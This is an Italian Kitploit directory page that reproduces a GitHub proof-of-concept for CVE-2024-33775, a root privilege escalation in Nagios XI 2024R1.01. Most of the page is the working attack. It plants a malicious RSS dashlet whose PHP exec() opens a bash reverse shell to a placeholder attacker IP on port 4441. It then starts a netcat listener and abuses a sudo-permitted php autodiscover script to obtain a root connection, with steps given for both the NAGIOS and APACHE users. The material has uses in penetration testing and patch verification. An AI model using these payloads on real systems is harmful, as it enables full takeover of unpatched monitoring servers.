Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-33775 — Privilege escalation exploit per Nagios XI 2024R1.01, che consente l'accesso root completo dagli utenti NAGIOS o APACHE tramite iniezione di dashlet RSS dannosi ed esecuzione di comandi sudo. | Kitploit
Strumenti/GitHubGitHub/neo-xed/cve-2024-33775
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Privilege escalation exploit per Nagios XI 2024R1.01, che consente l'accesso root completo dagli utenti NAGIOS o APACHE tramite iniezione di dashlet RSS dannosi ed esecuzione di comandi sudo.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE scoperto da: K. Wahab (Neo`X)

Dettagli della vulnerabilità:

  • Prodotto: Nagios XI Versione 2024R1.01
  • Vulnerabilità: Escalation dei privilegi dagli utenti "NAGIOS" o "APACHE"
  • Risultato: Accesso root completo sul sistema target
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

Exploit:

In questo esempio viene utilizzato RSS Dashlet.

1. Creare una nuova istanza di Nagios XI:

  • Puoi scaricare il file OVA di Nagios XI Versione 2024R1.01 da: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. Escalation dei privilegi:

Exploit come NAGIOS:

  • Aggiungi all'interno del file dashlet .inc.php in "/usr/local/nagiosxi/html/includes/dashlets/" il seguente contenuto:
root@kitploit:~
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • Avvia un server Netcat in ascolto sulla macchina dell'attaccante:
root@kitploit:~
nc -nlvp 4441
  • Esegui il seguente comando per aumentare i privilegi e ricevere una connessione come root:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

Exploit come APACHE:

  • Vai alla pagina di gestione dei "dashlets" e scarica una Dashlet:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • Modifica il file *.inc.php:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • Avvia un server Netcat in ascolto sulla macchina dell'attaccante:
root@kitploit:~
nc -nlvp 4441
  • Carica la dashlet dannosa nella pagina di gestione dei dashlets e attendi la connessione come utente APACHE.
  • Esegui il seguente comando per aumentare i privilegi e ricevere una connessione come root:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(Nota: dopo aver eseguito il comando riceverai la connessione come APACHE, usa CTRL+C per uscire e riavvia il listener più volte)

Apache_root

Scarica lo strumento